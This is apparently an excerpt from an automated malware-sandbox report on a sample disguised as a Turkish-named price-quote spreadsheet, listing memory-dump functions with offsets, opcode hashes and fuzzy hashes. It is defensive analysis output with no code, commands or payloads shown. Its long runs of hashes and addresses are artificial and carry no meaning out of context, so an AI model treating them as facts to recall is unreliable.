                                                  • Source File: 00000000.00000002.2063678264.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e20000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c7c2847558a2eb0cba31e3bc4beed085b2e0753ba74d62ab97c31c04eaa003fe
                                                  • Instruction ID: c219fad9fd225a3e55cc7f4aa1964d21455cbd90993e77848f030f8c664b874e
                                                  • Opcode Fuzzy Hash: c7c2847558a2eb0cba31e3bc4beed085b2e0753ba74d62ab97c31c04eaa003fe
                                                  • Instruction Fuzzy Hash: ECE04F74908208EBC704DF98E8459ADBBB9AB45311F2092A9984457342C6319A51DB91
                                                  Function 05AED580 Relevance: .0, Instructions: 20COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f70386b3fddd4c768d1924db9e726ad332311027347e63b3404bdc752a20d45b
                                                  • Instruction ID: 19b5f384a97fd2f9a9cfae193d1dfd80959ac8e47d927e3b96d62cb9741b9a8b
                                                  • Opcode Fuzzy Hash: f70386b3fddd4c768d1924db9e726ad332311027347e63b3404bdc752a20d45b
                                                  • Instruction Fuzzy Hash: 46E01A74904208EFCB45DF98C440AACBBF5FB48304F10C0A9E82897351C731AB42DF50
                                                  Function 05AE9FB8 Relevance: .0, Instructions: 20COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b34de1045fc63eadd3b2cc5244d7d73acc191fea202f661385fc9b4a21a20ca4
                                                  • Instruction ID: 960cf69b7e0ef87f0da4dcd20d139a53711835a8727b753965522807db3b3d7d
                                                  • Opcode Fuzzy Hash: b34de1045fc63eadd3b2cc5244d7d73acc191fea202f661385fc9b4a21a20ca4
                                                  • Instruction Fuzzy Hash: 14E01A34D08208AFC704DF98D4406ACBBB5EB48311F1081E9981853341C6319A11DB81
                                                  Function 05AD72CA Relevance: .0, Instructions: 20COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d82e79f2127aa1609b15d28e2fa955cd34fbb24c23338188b12f35068af27555
                                                  • Instruction ID: f4e881a92d50e200aa19faaf25243c938d37fc7d0b470e1f3c7e21fa775dee53
                                                  • Opcode Fuzzy Hash: d82e79f2127aa1609b15d28e2fa955cd34fbb24c23338188b12f35068af27555
                                                  • Instruction Fuzzy Hash: 2DF0F8B8A06219CBEB14EF19D840B9DBBB2FB58700F1042AAD409A3394DB305D81CF21
                                                  Function 05AD7D88 Relevance: .0, Instructions: 20COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 37d1b025f8ec096c81c4dea6e72fa39229f6a53363272e9ddc6b4c95f6228cd2
                                                  • Instruction ID: be57af3ae21d5d6554583330df3d34a30140d90c7d42bc6d71b63dd1e9839d69
                                                  • Opcode Fuzzy Hash: 37d1b025f8ec096c81c4dea6e72fa39229f6a53363272e9ddc6b4c95f6228cd2
                                                  • Instruction Fuzzy Hash: 41E04F30914108DFC784EFA8D440AACFBF5FB48215F2080E9880993341D7319A41CB51
                                                  Function 05E04134 Relevance: .0, Instructions: 20COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 549f9ef05d6760014fcfbdceef3912280ebbd61faefc67105229b50cb7b1d1b4
                                                  • Instruction ID: 80759a5162e185d3b3b73cd63fb07fc659fffdd905c8625d894c52a9b263a231
                                                  • Opcode Fuzzy Hash: 549f9ef05d6760014fcfbdceef3912280ebbd61faefc67105229b50cb7b1d1b4
                                                  • Instruction Fuzzy Hash: ECF0A0749092488FCB21CF24C8586DDBFB1EF08300F0540EAD089A7251CBB449C28F05
                                                  Function 05E39560 Relevance: .0, Instructions: 20COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063678264.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e20000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8824d7c57a0aa552b0c1576ce2cd6aafe0defc5670fcdee0af37562ed51857c8
                                                  • Instruction ID: 291e86fdc25b0edfd375d77322177d4ec1cf00f42f8668434dce423c258b109e
                                                  • Opcode Fuzzy Hash: 8824d7c57a0aa552b0c1576ce2cd6aafe0defc5670fcdee0af37562ed51857c8
                                                  • Instruction Fuzzy Hash: 31E04674908208EBCB04DFA4E8459ACBBB5FB45311F1091A99C8563352C772AA92DB90
                                                  Function 05E38300 Relevance: .0, Instructions: 20COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063678264.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e20000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 73f7c38bfbe4f8e9286d73261f61ef7b39882a66dc4450f86db83c34af5fa143
                                                  • Instruction ID: efce061b06bdb29d1a1de2a3144567e0d20f6b19904f93ec1230e9d422ec7aa4
                                                  • Opcode Fuzzy Hash: 73f7c38bfbe4f8e9286d73261f61ef7b39882a66dc4450f86db83c34af5fa143
                                                  • Instruction Fuzzy Hash: EBE01A34D09108EFCB04DF98D4455ACBBB5EB49205F1081E9D85853341D6319A01DF80
                                                  Function 05E3EE00 Relevance: .0, Instructions: 20COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063678264.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e20000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 73f7c38bfbe4f8e9286d73261f61ef7b39882a66dc4450f86db83c34af5fa143
                                                  • Instruction ID: d6e262ea3e8f8bb64feed8b884973ef8fd7730e65303e67a1184db03fb7776e4
                                                  • Opcode Fuzzy Hash: 73f7c38bfbe4f8e9286d73261f61ef7b39882a66dc4450f86db83c34af5fa143
                                                  • Instruction Fuzzy Hash: F7E01234D08208EFCB04DFA9D4456ACBBB9EB88205F1081EA985853341D732AA56DF81
                                                  Function 05AEAD48 Relevance: .0, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8cff971b782081be872672ab8b8778b010fc845ab8df5307d8135c937a7faade
                                                  • Instruction ID: 3fa48b834514f1a044d1b514147ded6566fca5e10e999ca724de7a5536e2dbc8
                                                  • Opcode Fuzzy Hash: 8cff971b782081be872672ab8b8778b010fc845ab8df5307d8135c937a7faade
                                                  • Instruction Fuzzy Hash: 5DE0C23085120CDFCB01FBB89444A9E77F9EB49201F8005F5840497120FAB15A10E7A2
                                                  Function 05AE9CB8 Relevance: .0, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1190437d47bf5767d391589164d77a1514a050ed58f637e80ef7507b3edb879e
                                                  • Instruction ID: 07e9b6e591f0df1c9c55dd63f57d25ea0d04336116ad0c51e9e93a1e48ef7973
                                                  • Opcode Fuzzy Hash: 1190437d47bf5767d391589164d77a1514a050ed58f637e80ef7507b3edb879e
                                                  • Instruction Fuzzy Hash: E6E0EC70915308DFCB54EFB89544A9DBBF5AB44205F5041A98908A2350E7719A90CB42
                                                  Function 05AEBC50 Relevance: .0, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4fdec3993ac14849a3cc2467ebba5d23c0adf6bfae93d05cc50bfa250144abd2
                                                  • Instruction ID: 033ac0aef75d45d191c6f8b9982243ae5c52212f19f79557d8e7bbe02d148718
                                                  • Opcode Fuzzy Hash: 4fdec3993ac14849a3cc2467ebba5d23c0adf6bfae93d05cc50bfa250144abd2
                                                  • Instruction Fuzzy Hash: F5E08C34908108DBC704DB94E4849ACBBB5EB89305F1081A8980823355CB32AE02CB90
                                                  Function 05AEA450 Relevance: .0, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b63ed97b3e152298f6b92ec9916f864f2a0c2475fbd538292ca5eec9796aeb38
                                                  • Instruction ID: bcaa2698669a69f7b02b3ff4ea8d36f063f0ae0fc17dbda38422d4385fdcc318
                                                  • Opcode Fuzzy Hash: b63ed97b3e152298f6b92ec9916f864f2a0c2475fbd538292ca5eec9796aeb38
                                                  • Instruction Fuzzy Hash: E3E0C23185120CAFC701EBF49448ADE77B9EB05201F4001F5850593110EAB15A10D7E2
                                                  Function 05AEC1E8 Relevance: .0, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4fdec3993ac14849a3cc2467ebba5d23c0adf6bfae93d05cc50bfa250144abd2
                                                  • Instruction ID: b831ed22cf4865f49a088c898bb6a1acb9ecd12d62c4c5993c697aaac4902426
                                                  • Opcode Fuzzy Hash: 4fdec3993ac14849a3cc2467ebba5d23c0adf6bfae93d05cc50bfa250144abd2
                                                  • Instruction Fuzzy Hash: 08E08C34908108EBC704EFE4E4529ACBBB9FB45311F1081AAC80813351DB32AE02CB80
                                                  Function 057EBEA8 Relevance: .0, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6c99335761a0cf0685501d0f887a98d685e8e516e5074902af9b4bda89405192
                                                  • Instruction ID: 190629fbf154e6cdbab652623721f72444c06420c27b5a694eec1a63a1ca4157
                                                  • Opcode Fuzzy Hash: 6c99335761a0cf0685501d0f887a98d685e8e516e5074902af9b4bda89405192
                                                  • Instruction Fuzzy Hash: 46E04671206209CFC324CB56E486A6277A3FB8C300F1582A1E60E47326CB34AC82DF80
                                                  Function 057E4020 Relevance: .0, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1077ddb2a82247e2f3350f543bd16545087f80d1b44f18ebc7e90fb55c77016e
                                                  • Instruction ID: 1ea8e20e1876ff5299021faf734a017904dddd54f4c0c23cd3b6403d0752d1f4
                                                  • Opcode Fuzzy Hash: 1077ddb2a82247e2f3350f543bd16545087f80d1b44f18ebc7e90fb55c77016e
                                                  • Instruction Fuzzy Hash: 79E01274919208DBCB05DF94E9415ACBFB6FB49315F5081E9DC0917351C732AE52DB81
                                                  Function 05AD6200 Relevance: .0, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 51fe7e2a92a429b45d6b321cbf46bd9c1cca685890a1939d4f0dadfb0f3fa4c8
                                                  • Instruction ID: 595d67bdc05d3babd7cb49f53a76038ce6f51b4eee17553bb637e0ae34ac6da4
                                                  • Opcode Fuzzy Hash: 51fe7e2a92a429b45d6b321cbf46bd9c1cca685890a1939d4f0dadfb0f3fa4c8
                                                  • Instruction Fuzzy Hash: 86E0EC74D69208DFCB40EFA8D4456ACBBF9AB09211F6041B9980993350E7355A50DBA1
                                                  Function 05ADFDF0 Relevance: .0, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3f8194a09731cd202910420cdc236164c03aa87d90f00dc4f041a67637ae68aa
                                                  • Instruction ID: 2a327efa830a7700ce1352c82a0f0d31bb678ef113cfa54cbee3efd6947cfaf6
                                                  • Opcode Fuzzy Hash: 3f8194a09731cd202910420cdc236164c03aa87d90f00dc4f041a67637ae68aa
                                                  • Instruction Fuzzy Hash: 9BE08C34908108DFC704EBA4E4409ADFBB5EB45301F1091A8D80A17342CB32AE02CB90
                                                  Function 05E00760 Relevance: .0, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f20ab6ff32cb76d78e2e35734e125f31fc9317590225292c4329b6fe02ef8c50
                                                  • Instruction ID: 9c668b1f98748b2f4f52e113b4f7502b9ba938366519f4d7336fdc9fccc24f4b
                                                  • Opcode Fuzzy Hash: f20ab6ff32cb76d78e2e35734e125f31fc9317590225292c4329b6fe02ef8c50
                                                  • Instruction Fuzzy Hash: C2E0C234908108EBC704EFA4E4486BCBBB5FB85305F54A1E8CC4813391C732AE42CF81
                                                  Function 05E05758 Relevance: .0, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f20ab6ff32cb76d78e2e35734e125f31fc9317590225292c4329b6fe02ef8c50
                                                  • Instruction ID: 7a09418c21bbc92444f9f1edddc762e0050d87242e08f53915f8d494c6ff81a1
                                                  • Opcode Fuzzy Hash: f20ab6ff32cb76d78e2e35734e125f31fc9317590225292c4329b6fe02ef8c50
                                                  • Instruction Fuzzy Hash: 5BE08C38908108EBC704DF94E4809ACBBB9EB45305F14A1AD884813391DB32AE42DF80
                                                  Function 05E05D58 Relevance: .0, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f20ab6ff32cb76d78e2e35734e125f31fc9317590225292c4329b6fe02ef8c50
                                                  • Instruction ID: 09fae601affa48d5136e842802a70a27ecf9718965f04f0f78100c95d59a9854
                                                  • Opcode Fuzzy Hash: f20ab6ff32cb76d78e2e35734e125f31fc9317590225292c4329b6fe02ef8c50
                                                  • Instruction Fuzzy Hash: 25E08C74908108EBC704DF94E4445ADBBB9EB45305F10A1AE884813391DB32AE42CB81
                                                  Function 0311C8A8 Relevance: .0, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ce27c636b36021677e3c600a8d6e76abc82c007c67f6dc3a3714c109e1ce563f
                                                  • Instruction ID: c29851926a9860a8c10c3b178370824e3040fa9f89433613f0c2aaa430db3ed2
                                                  • Opcode Fuzzy Hash: ce27c636b36021677e3c600a8d6e76abc82c007c67f6dc3a3714c109e1ce563f
                                                  • Instruction Fuzzy Hash: 3AE0127155110CDFC711EFB5D508ADE7BB9EB0A302F0045E6D40593124EBB65A14DB95
                                                  Function 03114D68 Relevance: .0, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b881a7472efe0cdd3b05ab766c50904eba357e3e6c40c9480fa7d6281a983a90
                                                  • Instruction ID: bc7523380c4da32d1b1018e5a3ab88dfee7325bc3db69e931c605e6ffde66ecb
                                                  • Opcode Fuzzy Hash: b881a7472efe0cdd3b05ab766c50904eba357e3e6c40c9480fa7d6281a983a90
                                                  • Instruction Fuzzy Hash: 5CE09A71906289DFCB48DFA4EA4156CBBB4EF4120072005EAC808DB262EB35AE06DB01
                                                  Function 05E3D398 Relevance: .0, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063678264.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e20000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 41f6dc6aa4c6193918a14e9c9f865a5d6ef1022b9dd51bc3bdbe4c2115632ee0
                                                  • Instruction ID: 7961f6d4f16b2b234ae85796c45bc223f28dc5372c9d90c7a2bc2bd19ded9f57
                                                  • Opcode Fuzzy Hash: 41f6dc6aa4c6193918a14e9c9f865a5d6ef1022b9dd51bc3bdbe4c2115632ee0
                                                  • Instruction Fuzzy Hash: A7E08C34908108DBC704DF94E9465ACBBB9EB45305F1091A8880813341CB32AE42CB80
                                                  Function 057EAECF Relevance: .0, Instructions: 18COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 43a19bd603357012f3123c5a6bc3adb69ed22448d580d5ac1d39063754b9f806
                                                  • Instruction ID: 80b84a82b123240db40136ffa107e692afe0d72f2f2e423d9728eba8bf9d4606
                                                  • Opcode Fuzzy Hash: 43a19bd603357012f3123c5a6bc3adb69ed22448d580d5ac1d39063754b9f806
                                                  • Instruction Fuzzy Hash: 57E08C74568244CFC765CBA8D089AAC7FF5FF0A321F1002D9D854CB3A2D332A941DB41
                                                  Function 057EAE88 Relevance: .0, Instructions: 18COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8a1448dee5f506755cf77aceb7e8ba8d9a06347ba1e3549cdb8165954184fb52
                                                  • Instruction ID: d9eeb7db9a3b2b6615a60ccc45622948e18e3d2906d296d7ce4c47204af3b97d
                                                  • Opcode Fuzzy Hash: 8a1448dee5f506755cf77aceb7e8ba8d9a06347ba1e3549cdb8165954184fb52
                                                  • Instruction Fuzzy Hash: 50E0EC74929308DFC740DFA8D44A6ACBBF5BB08202F6041A9980992251E7305A50DB51
                                                  Function 05AD6548 Relevance: .0, Instructions: 18COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 83b7a033ef14803936a5f8d7b565a24534d8846c7b599e7b0d3d7374a3e7afdd
                                                  • Instruction ID: 1ee9338adb983237d1b1b1c291b3d5d68c502ee8e15dcec4d5ceae71f8780c2d
                                                  • Opcode Fuzzy Hash: 83b7a033ef14803936a5f8d7b565a24534d8846c7b599e7b0d3d7374a3e7afdd
                                                  • Instruction Fuzzy Hash: C8D05E70D5A208DFC714EFE4E5449ADBBB9FB46302F1041A8D80A23258C7301E91DBA5
                                                  Function 05AD9A30 Relevance: .0, Instructions: 18COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ed06dee8785afed963523802e12f8550108207881d97bb2bd4dc62795f54fa86
                                                  • Instruction ID: 3401f5151ea5fc33edc5d76e5bbd374ca83e4684abca8c325d307884bb257dd1
                                                  • Opcode Fuzzy Hash: ed06dee8785afed963523802e12f8550108207881d97bb2bd4dc62795f54fa86
                                                  • Instruction Fuzzy Hash: D0E012B1A01309EFCF04DFB5ED41A6D77BAEBA5600F5085A9D40497244DA355E12AB90
                                                  Function 05E00E08 Relevance: .0, Instructions: 18COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 50dacd3c32468117b64515a86080751258797e24fb1adbae903cd4ba87871301
                                                  • Instruction ID: 647b1861ec7ba6db2e7008170f15ef63c80a40626a57ab7607e6b4c187ad7606
                                                  • Opcode Fuzzy Hash: 50dacd3c32468117b64515a86080751258797e24fb1adbae903cd4ba87871301
                                                  • Instruction Fuzzy Hash: B4E0C230818108EFCB50DBA8D4442ACBFB4EB05205F5090EDCC8863392D7329E52CB81
                                                  Function 05AEB570 Relevance: .0, Instructions: 17COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5f4a79e99154955b33f8b6a25e047823978e3dbb47bf5ef41dd15141eb1f4a3d
                                                  • Instruction ID: 4ef6325e1c22e7e389fb18eae1dc70c98bacb19b22506195cb7ff0944696bb20
